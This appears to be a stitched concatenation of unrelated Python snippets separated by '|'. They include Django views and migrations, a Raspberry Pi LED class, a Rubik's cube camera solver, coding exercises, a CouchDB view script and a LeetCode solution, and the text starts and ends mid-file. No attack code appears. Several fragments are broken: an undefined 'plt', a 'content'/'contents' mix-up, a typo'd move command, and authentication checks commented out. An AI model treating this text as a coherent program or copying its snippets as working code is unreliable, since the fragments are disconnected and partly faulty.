self.myDB.load_movies('ml-1m/movies.dat')
self.myDB.load_users('ml-1m/users.dat')
self.myDB.load_ratings('ml-1m/ratings.dat')
self.myDB.load_posters('ml-1m/images.dat')
else:
output['result'] = 'failure'
return json.dumps(output,encoding = 'latin-1')
|
'''
Write a pseudo-code to move from the start (S) to the end (E) in the maze.
Note: You can drag and drop the pseudo-code magnets to the pseudo-code box and create the appropriate pseudo-code.
'''
while(start!=end) do
if(Is_Next_Block_Bomp) then
move Down
move Dowm
else
move Right
end-if
end-while
|
import random
from cimensa.models import Words
class Homegame:
def __init__(self):
self.page_title = 'Games'
words = Words.objects.raw("SELECT id, word, part_of_speech, definition FROM cimensa_words ORDER BY RAND() LIMIT 6")
rnd = random.random()
self.correct = 1+int(6 * rnd)
self.words = words
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='aug_c'),
] |
import json
from django import forms
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http.response import HttpResponse, HttpResponseBadRequest
from django.shortcuts import render, get_object_or_404
from django.core.urlresolvers import reverse
from django.views import generic
Criterion = apps.get_model('ddm_core', 'Criterion')
Option = apps.get_model('ddm_core', 'Option')
Score = apps.get_model('ddm_core', 'Score')
Category = apps.get_model('ddm_core', 'Category')
def get_score(criterion, option, user):
try:
score = Score.objects.get(
user=user,
option=option,
criterion=criterion,
)
except Score.DoesNotExist:
score = None
return score
class ListView(LoginRequiredMixin, generic.ListView):
template_name = 'scoring/list.html'
model = Category
context_object_name = 'category_scores'
def get(self, request, *args, **kwargs):
self.option = get_object_or_404(Option, uuid=self.kwargs['option_uuid'])
return super(ListView, self).get(request, *args, **kwargs)
def get_queryset(self):
# Querset will be a list of tuples in the form (Criterion, Score)
queryset = []
for category in super(ListView, self).get_queryset():
subQueryset = []
for criterion in category.criteria.all():
subQueryset.append(
(criterion, get_score(criterion, self.option, self.request.user))
)
queryset.append((category, subQueryset))
return queryset
def get_context_data(self, **kwargs):
context = super(ListView, self).get_context_data(**kwargs)
context.update(
option=self.option,
)
return context
class ScoreForm(forms.ModelForm):
value = forms.IntegerField(required=False)
class Meta:
fields = ['value']
model = Score
def save(self, commit=True):
if self.cleaned_data.get('value') is not None:
super(ScoreForm, self).save()
else:
if self.instance and self.instance.pk:
self.instance.delete()
class SetView(LoginRequiredMixin, generic.CreateView):
model = Score
form_class = ScoreForm
def get_form_kwargs(self):
self.option = get_object_or_404(Option, uuid=self.kwargs.get('option_uuid'))
self.criterion = get_object_or_404(Criterion, uuid=self.kwargs.get('criterion_uuid'))
score = get_score(self.criterion, self.option, self.request.user)
# If the score already exists for this user/criterion, then update the
# instance of it rather than creating a new one
if score:
self.object = score
return super(SetView, self).get_form_kwargs()
def form_valid(self, form):
if not form.instance.id:
form.instance.option = self.option
form.instance.criterion = self.criterion
form.instance.user = self.request.user
if self.request.is_ajax():
form.save()
return HttpResponse('OK')
else:
return super(SetView, self).form_valid(form)
def form_invalid(self, form):
if self.request.is_ajax():
return HttpResponseBadRequest(json.dumps(form.errors))
else:
return super(SetView, self).form_invalid(form)
def get_success_url(self):
return reverse('scoring:list', args=(self.option.uuid,))
|
"""
LED
Author: Robert Ross
Outputs data to the led on the indicated pin
"""
import RPi.GPIO as GPIO
class LED:
"""
Handles the control of an LED
"""
def __init__(self, dataPin=4):
"""
Create the object to talk to the LED
Keyword arguments:
dataPin - the pin that is used to talk to the led
"""
self.dataPin = dataPin
if GPIO.getmode() == -1:
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.dataPin, GPIO.OUT)
def on(self):
"""Turn on the LED"""
GPIO.output(self.dataPin, True)
def off(self):
"""Turn off the LED"""
GPIO.output(self.dataPin, False)
def onPercent(self, percentage):
"""Turn on the LED a percentage through PWM"""
GPIO.PWM(self.dataPin, percentage)
def offPercent(self, percentage):
"""Turn off the LED a percentage through PWM"""
self.onPercent(100.0 - percentage)
|
import itertools
INDEX = 1000000
permutation_list = list(itertools.permutations(range(10)))
permutation_list.sort()
output = list(permutation_list[INDEX - 1])
output = map(str, output)
print ''.join(output)
|
# -*- coding: utf-8 -*-
"""A daily rotating file."""
from threading import Lock
from time import localtime
from time import mktime
from time import strftime
from time import time
class RotatorInfo:
"""information about a rotating file."""
def __init__(self, base, format='.%y%m%d'):
self._base = base
self._format = format
self._setup()
def toSwitch(self):
"""true, when we should switch filename."""
return time() > self._limit
def getFilename(self):
"""the current filename."""
if self.toSwitch():
self._setup()
return self._filename
def _setup(self, _t=(0, 0, 0)):
lt = localtime(time())
st = lt[:3] + _t + lt[6:]
self._limit = mktime(st[:2] + (st[2] + 1, ) + st[3:])
self._filename = self._base + strftime(self._format, st)
class Rotator(RotatorInfo):
"""a rotating writable file like object."""
def __init__(self, base, format='.%y%m%d', lock=0):
RotatorInfo.__init__(self, base, format)
self._lock = lock and Lock()
self._open()
def write(self, str):
"""write *str* and flush."""
lock = self._lock
if lock:
lock.acquire()
try:
if self.toSwitch():
self._open()
f = self._file
f.write(str)
f.flush()
finally:
if lock:
lock.release()
def flush(self):
"""helper to support applications that want to flush themselves."""
pass
def close(self):
if self._file is not None:
self._file.close()
self._file = None
def _open(self):
self._file = open(self.getFilename(), "a") # ATT: developped for Unix
|
# Generated by Django 2.0 on 2021-05-11 09:13
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('barter', '0004_auto_20210418_1533'),
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.SmallIntegerField(choices=[(0, '待查阅'), (1, '失败'), (2, '成功')], default=0, verbose_name='状态')),
('isDelete', models.BooleanField(default=False, verbose_name='是否删除')),
],
options={
'verbose_name': '交易记录表',
'verbose_name_plural': '交易记录表',
},
),
migrations.AlterModelOptions(
name='barter',
options={'ordering': ['-created_time'], 'verbose_name': '换品', 'verbose_name_plural': '换品'},
),
migrations.AlterField(
model_name='barter',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='barter/%Y%m%d/', verbose_name='换品图片'),
),
migrations.AddField(
model_name='application',
name='buy_barter',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='buy_barter', to='barter.Barter'),
),
migrations.AddField(
model_name='application',
name='buyer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='buyer', to=settings.AUTH_USER_MODEL, verbose_name='买家'),
),
migrations.AddField(
model_name='application',
name='sell_barter',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sell_barter', to='barter.Barter'),
),
migrations.AddField(
model_name='application',
name='seller',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='seller', to=settings.AUTH_USER_MODEL, verbose_name='卖家'),
),
]
|
from django.contrib import admin
from .models import Product, userProducts, UserProfile
# creating a list for the admin page view
@admin.register(UserProfile)
class UserProfile(admin.ModelAdmin):
list_display = ("user", "first_name", 'last_name', 'phone_number')
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
list_display = ("product_name", "product_type", 'product_price')
@admin.register(userProducts)
class userProductsAdmin(admin.ModelAdmin):
pass |
"""12. Using Ternary operator or COnditional operator: Identify minimum of three numbers """
a = 10
b = 20
c = 3
print(a if (a < b and a < c) else (b if (b < a and b < c)else c))
|
from django.shortcuts import render
# Create your views here.
def demo_home(request):
# if request.user.is_authenticated():
return render(request, "demo_home.html", {})
# else:
#return render(request, "registration/login.html", {})
def demo_sales(request):
# if request.user.is_authenticated():
return render(request, "demo_sales.html", {})
def demo_customers(request):
# if request.user.is_authenticated():
return render(request, "demo_customers.html", {})
def demo_acustomers(request):
# if request.user.is_authenticated():
return render(request, "demo_acustomers.html", {})
def demo_arefund(request):
# if request.user.is_authenticated():
return render(request, "demo_arefund.html", {})
def zzz(request):
# if request.user.is_authenticated():
return render(request, "zzz.html", {}) |
import numpy as np
import os
from utils.utils import from_csv_with_filenames
from utils.constants import Constants
#import matplotlib.pyplot as plt
from collections import OrderedDict
CSV_PATH = os.path.join(
Constants.DATA_FOLDER,
'10classes',
'audio_data.csv'
)
def get_prototypes(xs, ys):
prototype_dict = {unique_y: [] for unique_y in set(ys)}
for i, x in enumerate(xs):
prototype_dict[ys[i]].append(x)
prototype_dict = {k: np.array(prototype) for k, prototype in prototype_dict.items()}
result = dict()
for y in set(sorted(ys)):
result[y] = np.mean(prototype_dict[y], axis=0)
return result
def average_prototype_distance_matrix(xs, ys, filenames):
"""
Relies on all y in ys being in the interval [0, number of classes)
As a general rule, x in xs and y in ys are not ordered by class but by speaker
That is why I am not using models.som.SOMTest.classPrototype, which
has the opposite assumption
"""
prototype_distance_matrix = np.zeros((len(set(ys)), len(set(ys))))
# compute prototypes in dictionary d
prototype_dict = {unique_y: [] for unique_y in set(ys)}
for i, x in enumerate(xs):
prototype_dict[ys[i]].append(x)
prototype_dict = {k: np.array(prototype) for k, prototype in prototype_dict.items()}
for y in set(ys):
prototype_dict[y] = np.mean(prototype_dict[y], axis=0)
prototypes = np.asarray(list(prototype_dict.values())).T
for i, x in enumerate(xs):
prototype_distance_matrix[ys[i]][:] += np.mean(np.absolute(prototypes - x.reshape((-1, 1))), axis=0).T
print(prototype_distance_matrix)
plt.matshow(prototype_distance_matrix, cmap=plt.get_cmap('Greys'))
plt.show()
def examples_distance(xs, i1, i2):
return np.linalg.norm(xs[i1]-xs[i2])
if __name__ == '__main__':
xs, ys, filenames = from_csv_with_filenames(CSV_PATH)
ys = [int(y)-1000 for y in ys] # see comment above
average_prototype_distance_matrix(xs, ys, filenames)
#i1 = 23
#i2 = 163
#d = examples_distance(xs, i1, i2)
#print(d)
|
import traceback
from .video_input import WebcamVideoStream
from .image_processing_utils import *
from . import *
close_flag = False
def on_close(event):
global close_flag
close_flag = True
color_names = {0:"white", 1:"red", 2:"blue", 3:"orange", 4:"green", 5:"yellow", -2: "gray", -1:"purple?"}
def face_equal_norot(face1, face2):
"""
We check if 2 faces are equal independently of their orientation
"""
are_equal = False
i = 0
while i < 4 and not are_equal:
are_equal = are_equal or (face1 == np.rot90(face2, i)).all()
i += 1
return are_equal
class Cube_calibrator:
def __init__(self, config):
# Set configuration from the config file
self.fps = config["fps"]
self.solver_type = config["solver"]
self.segm_method = config["segm_method"]
self.confirm_time = config["face_confirmation_time"]
self.tick_time = config["tick_showing_time"]
self.on_phone = config["on_phone"]
self.debug = config["debug"]
# Internal parameters
self.cam = WebcamVideoStream(fps=self.fps)
self.last_face = -1
self.calibrated = False
self.solution_found = False
self.finished = False
self.cube = Cube(3)
self.cube_next = None
self.solver = None
def arrange_cube(self, faces, colors):
"""
With the 6 faces of the cube and knowing that they are arranged in a certain order
we put them in the correct position and orientation.
We return a normalized cube (that has the top face as white, left face as red and front face as blue)
"""
opposites = {0:5,1:3,2:4,3:1,5:0}
faces[0] = np.rot90(faces[0],3)
faces[5] = np.rot90(faces[5],2)
return Cube(3, faces).normalize()
def get_shape_coords(self, shape_type, scale, offset, progress, rotation):
"""
Gets the coordinates to draw some basic shapes with plots
The shapes implemented are:
- Circunference both complete and incomplete
- Check mark or Tick
- Straight arrow
- Circle with arrow
- Flat line
"""
if shape_type == 'circle':
rad_rot = np.pi*rotation/180
max_theta = (2*np.pi)*progress
theta = np.linspace(0, max_theta, 100)
theta = theta + rad_rot
indicator_x = scale*np.cos(theta)
indicator_y = scale*np.sin(theta)
elif shape_type == 'tick':
indicator_x = scale*np.array([-0.5,0,0.75])
indicator_y = scale*np.array([0,0.75,-0.75])
elif shape_type == 'arrow':
indicator_x = scale*np.array([-1,1,0.25,1,0.25])
indicator_y = scale*np.array([0, 0, 0.5,0,-0.5])
if rotation == 90:
indicator_x, indicator_y = indicator_y, -indicator_x
elif rotation == 180:
indicator_x = -indicator_x
elif rotation == 270:
indicator_x, indicator_y = indicator_y, indicator_x
elif shape_type == 'arrow_circle':
theta = np.linspace(0, 3*np.pi/2, 100)
indicator_x = scale*np.hstack([np.cos(theta), [0.2, -0.2, 0.2, -0.2, 0.2]])
indicator_y = scale*np.hstack([np.sin(theta), [-1, -0.5, -1, -1.5, -1]])
if rotation == 180:
indicator_x = -indicator_x
elif shape_type == 'dash':
indicator_x = scale*np.array([-1,1])
indicator_y = scale*np.array([0, 0])
indicator_x = indicator_x + offset[1]
indicator_y = indicator_y + offset[0]
return indicator_x, indicator_y
def main(self, phone=True):
"""
Executes the real time program, split in 3 phases:
-Calibration: the cube is calibrated by pointing the camera to it's
6 faces in a determined order indicated to the user
-Solving: a solver thread is launched and a progress circle is shown
-Showing solution: the solution will be shown as well as the arrow
indicating which move to make each step
"""
self.cam.start()
solver_thread = None
try:
## Initialize plot
# Make plots update
plt.ion()
# Create figure
fig = plt.figure()
# Make the closing of the window finish the program
fig.canvas.mpl_connect('close_event', on_close)
# Create a subplot to draw to
ax = plt.subplot()
# Initialize the subplot by drawing a picture and a line
I_rgb = self.cam.read()
if self.on_phone:
I_rgb = cv2.rotate(I_rgb, cv2.ROTATE_90_CLOCKWISE)
im = ax.imshow(np.zeros(I_rgb.shape))
indic, = ax.plot([0,0],[0,0], linewidth=10)
plt.show()
# Set indicator offset
if phone:
indicator_offset = [I_rgb.shape[0]*(7/8), I_rgb.shape[1]/2]
else:
indicator_offset = [I_rgb.shape[0]/2, I_rgb.shape[1]*(7/8)]
# Set some parameters up
frame_time = 1/self.fps
start = time.time()
face_confirm_timer = 0
tick_timer = 0
solution_timer = 0
prev_face = np.zeros([1,1])
colors_checked = []
faces = []
solution = []
alpha = 1
warned = False
# Main loop
while not self.finished and not close_flag:
# Measure time for FPS control
frame_start = time.time()
# clear last frame's data
ax.clear()
## Image Aquisition
frame_original = self.cam.read()
# The original image will be in BGR, we transform it to RGB
frame_original = cv2.cvtColor(frame_original, cv2.COLOR_BGR2RGB)
if self.on_phone:
frame_original = cv2.rotate(frame_original, cv2.ROTATE_90_CLOCKWISE)
## Pre-processing
frame_hsv, frame_original = preprocess_image(frame_original)
## Extraction of characteristics
# Get binarized image, various implementations, "binarize" works best
if self.segm_method == "binarize":
frame_bw = binarize(frame_hsv)
elif self.segm_method == "borders":
frame_bw = filled_borders(frame_hsv)
else:
frame_bw = binarize(frame_hsv)
if not warned:
print(f"WARNING: \"{self.segm_method}\" is not a valid segmentation method, we default to \"binarize\"")
warned = True
# Find the features to analyze
contours, positions = find_contours(frame_bw, debug = self.debug)
## Description
face, face_positions, stiker_size = get_ordered_colors(frame_hsv, contours, debug = self.debug)
## User interaction
# Initialize indicator data
indic_size = 40
indicator_x = []
indicator_y = []
indicator_color = "w"
linestyle = "solid"
if not self.calibrated:
## Phase 1: Obtain the colors of the faces
plt.title("Cube calibration")
if face.ndim == 2 and (face == prev_face).all() and face[1,1] not in colors_checked:
# We are checking a new face
# Reset timer for the checkmark
tick_timer = time.time()
# Get progress circle to draw later
indicator_x, indicator_y = self.get_shape_coords("circle", indic_size, indicator_offset, (time.time() - face_confirm_timer)/self.confirm_time, 0)
indicator_color = "orange"
# When the timer finishes add the face to out list of faces
if time.time() - face_confirm_timer > self.confirm_time:
colors_checked.append(face[1,1])
faces.append(face)
self.last_face = face[1,1]
if len(faces) == 6:
self.calibrated = True
elif face.ndim == 2 and (face == prev_face).all() and face[1,1] in colors_checked and time.time() - tick_timer < self.tick_time:
# The face we are seeing is already stored
# Reset timer for face confirmation
face_confirm_timer = time.time()
# Get green check mark to draw later
indicator_x, indicator_y = self.get_shape_coords("tick", indic_size, indicator_offset, 0, 0)
indicator_color = "green"
else:
# Reset timer for face confirmation
face_confirm_timer = time.time()
# Update the face
prev_face = face
# Show user the direction in which they have to rotate the cube
if len(colors_checked) == 0:
indicator_x, indicator_y = self.get_shape_coords("dash", indic_size, indicator_offset, 0, 0)
elif len(colors_checked) in [1,5]:
indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, indicator_offset, 0, 270)
elif len(colors_checked) in [2,3,4]:
indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, indicator_offset, 0, 0)
indicator_color = "w"
# Show color text
if face_positions is not None:
face_list = face.flatten()
for i in range(face_positions.shape[1]):
# Calculate text size, linear equation with points (4000,10),(900,5)
m = (10-5)/(4000-900)
area = stiker_size[0]*stiker_size[1]
text_size = m*(area-4000) + 10
# Don't make smaller than size 6
text_size = max(text_size, 6)
# Show the name of the color of each sticker
ax.annotate(color_names[face_list[i]], face_positions[:,i], color='#F0F0F0', size=text_size, ha='center', fontweight="heavy")
elif not self.solution_found:
## Phase 2: Solve cube in a thread
if self.solver is None:
# Launch the solver thread
# Arrange faces aquired into a cube
self.cube = self.arrange_cube(faces, colors_checked)
# Launch solver thread
self.solver = Cube_solver_thread(self.cube, self.solver_type)
self.solver.setDaemon(True)
self.solver.start()
#
solution_timer = time.time()
if self.solver.solution_found:
# The solver has found a solution, go to the next phase
plt.title("Showing cube solution")
self.solution_found = True
# Show solution on the console
print("Solution in text form:")
print(self.solver.solution)
print(f"It took {time.time() - solution_timer} seconds to find the solution")
# Set up the solution list for the next phase
solution = self.solver.solution
solution.append("--")
# Store a cube with one of the moves done for next phase
self.cube_next = self.cube.turn(solution[0])
else:
# The solver is not done yet, be nice to the user, they might get impatient
plt.title("Solving cube...")
# Show rotating section of a circle
indicator_x, indicator_y = self.get_shape_coords("circle", indic_size, indicator_offset, 0.2, (time.time() - solution_timer)*180)
indicator_color = "white"
elif solution[0] != 'Incorrect cube solver' and solution[0] != '--':
## Phase 3: Show solution steps
if self.debug:
print(self.cube.toStringColor())
print(self.cube_next.toStringColor())
plt.title("Showing solution")
# Check for colors that would never be on the stickers of a rubik's cube
has_bad_colors = False
if face.ndim == 2:
has_bad_colors = (face < 0).any()
if has_bad_colors and self.debug:
print("Bad colors found")
if face.ndim == 2 and not has_bad_colors:
# We are looking at a face right now
# The color of the center tells us which face we are looking at
face_color = int(face[1,1])
# We get the rotation we would have to do to a normalized cube for
# it to be oriented like our cube
transform, unique = self.cube.face_to_front(face)
# We apply the transformation to the first move of the solution
relative_move = transformAlg([solution[0]], transform)[0]
if relative_move[0] not in ['B', 'F'] and face_equal_norot(self.cube_next.faces[face_color,:,:], face):
# Show progress circle to confirm that the face has been turned correctly
indicator_x, indicator_y = self.get_shape_coords("circle", indic_size, indicator_offset, 2*(time.time() - face_confirm_timer)/self.confirm_time, 0)
indicator_color = "orange"
# If the timer is done, go to the next step of the solution
if time.time() - face_confirm_timer > self.confirm_time/2:
self.cube = self.cube.turn(solution.pop(0))
self.cube_next = self.cube_next.turn(solution[0])
elif face_equal_norot(self.cube.faces[face_color,:,:], face):
# Reset the confirmation timer
face_confirm_timer = time.time()
# We initiate some parameters
face_pos_aux = face_positions[[1,0],:]
rot = 0
indic_size = 80
if relative_move[-1] == "'":
rot = 180
# We show an arrow indicating the next move that the user must perform
arrow_pos = [0,0]
if relative_move[0] == 'U':
arrow_pos = face_pos_aux[:,1]
indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, (180+rot)%360)
arrow_pos = arrow_pos + np.array([-40,0])
elif relative_move[0] == 'D':
arrow_pos = face_pos_aux[:,7]
indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, (rot)%360)
arrow_pos = arrow_pos + np.array([-40,0])
elif relative_move[0] == 'R':
arrow_pos = face_pos_aux[:,5]
indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, 90 + rot)
arrow_pos = arrow_pos + np.array([0,40])
elif relative_move[0] == 'L':
arrow_pos = face_pos_aux[:,3]
indicator_x, indicator_y = self.get_shape_coords("arrow", indic_size, arrow_pos, 0, 270 - rot)
arrow_pos = arrow_pos + np.array([0,40])
elif relative_move[0] == 'F':
arrow_pos = face_pos_aux[:,4]
indicator_x, indicator_y = self.get_shape_coords("arrow_circle", indic_size, arrow_pos, 0, rot)
arrow_pos = arrow_pos + np.array([120,0])
elif relative_move[0] == 'B':
arrow_pos = face_pos_aux[:,4]
indicator_x, indicator_y = self.get_shape_coords("arrow_circle", indic_size, arrow_pos, 0, (180+rot)%360)
arrow_pos = arrow_pos + np.array([120,0])
linestyle = "dashed"
indicator_color = "#66ccff"
if relative_move[-1] == "2":
ax.annotate("x2", (arrow_pos[1], arrow_pos[0]), color='white', size=20, ha='center', fontweight="heavy")
if relative_move[0] in ['B', 'F']:
# We cannot work with B or F moves, performing them doesn't change the face making it
# imposible to guide the user towards the solution
ax.annotate("Change face please", face_positions[:,4], color='white', size=10, ha='center')
else:
face_pos_aux = face_positions[[1,0],:]
ax.annotate("Your last move was wrong, try again", face_pos_aux[[1,0],1], color='white', size=10, ha='center')
else:
# Reset confirmation timer
face_confirm_timer = time.time()
# Show the entire solution in the screen
ax.annotate(" ".join(solution[:-1]), (indicator_offset[1], indicator_offset[0]), color='white', size=15, ha='center')
else:
## END: We are done, close the app
print("CONGRATULATIONS, YOUR CUBE IS NOW SOLVED.")
self.finished = True
# Draw indicator
ax.plot(indicator_x, indicator_y, indicator_color, linewidth = 6, linestyle = linestyle)
## Display
im = ax.imshow(np.zeros(I_rgb.shape))
im.set_data(frame_original)
# Update plot
fig.canvas.draw_idle()
fig.canvas.flush_events()
# Measure time for FPS control
frame_end = time.time()
# Limit FPS
time_passed = frame_end - frame_start
if time_passed < frame_time:
time.sleep(frame_time-time_passed)
except KeyboardInterrupt:
print("Manually interrupted")
except Exception:
traceback.print_exc()
if solver_thread is not None:
solver_thread.join()
self.cam.stop()
self.current_face = -1
|
"""
Dictionary
* Translator playground
📚 Resources:
https://www.youtube.com/watch?v=rfscVS0vtbw&t=1s&ab_channel=freeCodeCamp.org
"""
vowel = ['a', 'e', 'i', 'o', 'u']
# Translate function: If letter is a vowel, we transform it to g
def translate(phrase):
translation = ''
for letter in phrase:
if letter.lower() in vowel:
if letter.isupper():
translation = translation + 'G'
else:
translation = translation + 'g'
else:
translation = translation + letter
return translation
print(translate(input('Enter a phrase: ')))
|
import sys
from PyQt5.uic import loadUi
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QDialog, QApplication, QWidget
from PyQt5.QtGui import QPixmap
from qt_material import apply_stylesheet # pip install qt-material
class WelcomeScreen(QDialog):
def __init__(self):
super(WelcomeScreen, self).__init__()
loadUi("my.ui",self)
#self.login.clicked.connect(self.gotologin)
#self.create.clicked.connect(self.gotocreate)
app = QApplication(sys.argv)
welcome = WelcomeScreen()
widget = QtWidgets.QStackedWidget()
apply_stylesheet(app, theme='dark_cyan.xml')
widget.addWidget(welcome)
widget.setFixedHeight(800)
widget.setFixedWidth(1200)
widget.show()
try:
sys.exit(app.exec_())
except:
print("Exiting")
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from scrapy.loader import ItemLoader
from scraper.items import MatchItem as Match
import json
class FutureSpider(CrawlSpider):
name = 'future'
start_urls = [
'http://www.dofus.com/fr/mmorpg/communaute/tournois/goultarminator/calendrier?date=2016-08-10#jt_list/',
]
def parse(self, response):
self.games = []
game = []
for team in response.css('table.ak-ladder tr td:first-child a::text').extract():
# team_with_composition = [team, composition]
if len(game) == 0:
game = [team]
else:
game.append(team)
self.games.append(game)
game = []
games_with_composition = []
for game in self.games:
i = 0
teams_with_composition = []
for team in game:
i = i + 1
team_with_composition = [str(team), self.get_team_composition(team)]
teams_with_composition.append(team_with_composition)
if i == 2:
i = 0
games_with_composition.append(teams_with_composition)
print(games_with_composition)
yield {
'games': games_with_composition
}
def get_team_composition(self, team_name):
with open('teams.json') as data_file:
servers = json.load(data_file)
for server in servers:
for team in server['teams']:
if team['name'] == team_name.lower():
return team.get('composition') |
a = int(input())
b = int(input())
indeks = a
while indeks <= b:
if indeks%2 == 0:
print(indeks)
indeks += 1
for a in range(b):
if a%2 == 0:
print(a) |
"""
#十進制轉換
(若為 C 語言,請使用一個 loop 和 function call)
給予一個十進位整數,請撰寫一程式可以將此十進位整數轉換為指定的進制的整數。
輸入說明:
輸入分為兩部份,包括指定的進制數
(2 ~ 16)
與十進位整數(0 ~ 1000000000)
輸出說明:
經轉換後的新進位制的整數( y )
不合法的輸入則輸出E
input:
16 1234
output:
4D2
----------------------
Input:
8 56456456
Output:
327272410
-----------------------
Input:
11 17489465
Output:
9966104
-----------------------
Input:
4 17489
Output:
10101101
"""
def cal(a,b):
list = ['A', 'B', 'C', 'D', 'E', 'F']
str_tran=""
while a>=b:
x=a%b
if(x>=10):
str_tran=str(str_tran)+list[x%10]
else:
str_tran=str(str_tran)+str(x)
a=a//b
str_tran=str(str_tran)+str(a)
return str_tran
def output(ans):
return ans[::-1]
def main():
x=input()
y=str.split(x)
if(int(y[0])<2 or int(y[0])>16 or int(y[1])<0 or int(y[1])>1000000000):
print('E')
else:
ans=cal(int(y[1]),int(y[0]))
ans=output(ans)
print(ans)
main() |
import couchdb
import urllib2
import json
dbName = 'tweets3'
ServerUrl = "http://127.0.0.1:5984/"
designName = 'suburbs'
server = couchdb.Server(ServerUrl)
db = server[dbName]
test_view = """function (doc) {
emit(doc.suburb, 1);
}"""
design = {'views': {"sub_lst": {'map': test_view, 'reduce': '_count'}}, 'language': 'javascript'}
db["".join("_design/"+designName)] = design
url = ServerUrl+dbName+'/_design/'+designName+'/_view/sub_lst?reduce=true&group_level=1'
contents = urllib2.urlopen(url).read()
data = json.loads(content.decode("utf-8").replace("'", '"'))
print(data)
|
import base64
# base64编码原理:https://blog.csdn.net/zhubaoJay/article/details/72957135
'''
print(base64.b64encode(b'binary\x00string'))
print(base64.b64decode(b'YmluYXJ5AHN0cmluZw=='))
print(base64.b64encode(b'i\xb7\x1d\xfb\xef\xff'))
print(base64.urlsafe_b64encode(b'i\xb7\x1d\xfb\xef\xff'))
# 标准base64编码后可能出现+和/,在URL中不能直接作为参数
# urlsafe将+和/转化为-和_
print(base64.urlsafe_b64decode('abcd--__'))
'''
def safe_base64_decode(s):
if len(s)%4 !=0:
n = 4-len(s)%4
s = bytes(s, encoding = 'utf-8')+b'='*n
s = base64.b64decode(s)
print(s)
if __name__ == '__main__':
a = input('please input compiled str:')
safe_base64_decode(a) |
from functools import reduce
def knot_hash_round(lst, lengths, pos, skip):
for l in lengths:
rev = list(reversed([lst[(pos + i) % len(lst)] for i in range(l)]))
for i in range(l):
lst[(pos + i) % len(lst)] = rev[i]
pos += (l + skip) % len(lst)
skip += 1
return pos, skip
def part_1():
lengths = []
with open('input/day10_input', 'r') as f:
lengths = [int(l) for l in f.readline().strip().split(',')]
lst = [i for i in range(256)]
pos = 0
skip = 0
pos, skip = knot_hash_round(lst, lengths, pos, skip)
print('Part 1: {}'.format(lst[0] * lst[1]))
def part_2():
lengths = []
with open('input/day10_input', 'r') as f:
lengths = [ord(l) for l in f.readline().strip()] + [17, 31, 73, 47, 23]
lst = [i for i in range(256)]
pos = 0
skip = 0
for r in range(64):
pos, skip = knot_hash_round(lst, lengths, pos, skip)
dense_hash = [reduce(lambda x, y: x ^ y, lst[i*16:(i+1)*16]) for i in range(16)]
print('Part 2: {}'.format(''.join(format(i, '02x') for i in dense_hash)))
part_1()
part_2()
|
#!/usr/bin/env python3
if __name__ == "__main__":
while True:
i = int(input())
if i == -1:
break
d = 0
tot = 0
for ii in range(i):
s, t = list(map(int, input().split()))
t = t-d
d+=t
tot += t * s
print("{} miles".format(tot))
|
"""
Solution for 340. Longest Substring with At Most K Distinct Characters
https://leetcode.com/problems/longest-substring-with-at-most-k-distinct-characters/
"""
from collections import defaultdict
from collections import OrderedDict
class Solution:
"""
Runtime: 72 ms, faster than 86.01% of Python3 online submissions for Longest Substring with At Most K Distinct Characters.
Memory Usage: 12.9 MB, less than 100.00% of Python3 online submissions for Longest Substring with At Most K Distinct Characters.
"""
def lengthOfLongestSubstringKDistinct(self, s: str, k: int) -> int:
"""
Given a string, find the length of the longest substring T that contains at most k distinct characters.
Example 1:
Input: s = "eceba", k = 2
Output: 3
Explanation: T is "ece" which its length is 3.
Example 2:
Input: s = "aa", k = 1
Output: 2
Explanation: T is "aa" which its length is 2.
Args:
s:
k:
Returns:
"""
return self.optimal_solution(s, k)
def initial_solution(self, s: str, k: int) -> int:
"""
An initial solution that runs in O(N) in time and O(K) in space
Args:
s:
k:
Returns:
"""
counter = defaultdict(int)
i, j, res = 0, 0, 0
while j < len(s):
while j < len(s) and len(counter) <= k:
counter[s[j]] += 1
j += 1
if len(counter) <= k:
res = max(res, j - i)
while i < j and len(counter) > k:
counter[s[i]] -= 1
if counter[s[i]] == 0:
del counter[s[i]]
i += 1
return res
def optimized_solution(self, s: str, k: int) -> int:
"""
A time optimized solution that runs in O(NK) in time and O(k) in space
Args:
s:
k:
Returns:
"""
index_map = {}
i, j, res = 0, 0, 0
while j < len(s):
while j < len(s) and len(index_map) <= k:
index_map[s[j]] = j
j += 1
if len(index_map) <= k:
res = max(res, j - i)
while i < j and len(index_map) > k:
i = min(index_map.values())
del index_map[s[i]]
i += 1
return res
def optimal_solution(self, s: str, k: int) -> int:
"""
An optimal solution combining the initial and optimized solution. It runs
in O(N) in time and O(K) in space
Args:
s:
k:
Returns:
"""
ordered_map = OrderedDict()
i, j, res = 0, 0, 0
while j < len(s):
while j < len(s) and len(ordered_map) <= k:
if s[j] in ordered_map:
del ordered_map[s[j]]
ordered_map[s[j]] = j
j += 1
if len(ordered_map) <= k:
res = max(res, j - i)
while i < j and len(ordered_map) > k:
_, i = ordered_map.popitem(last=False)
i += 1
return res
|
from typing import Optional, Union
__all__ = ["MissingSerializerError", "IncompleteOrCorruptedStreamError"]
class MissingSerializerError(Exception):
"""
Raised when trying to serialize a value whose type is not registered
with a serializer.
"""
class IncompleteOrCorruptedStreamError(Exception):
"""
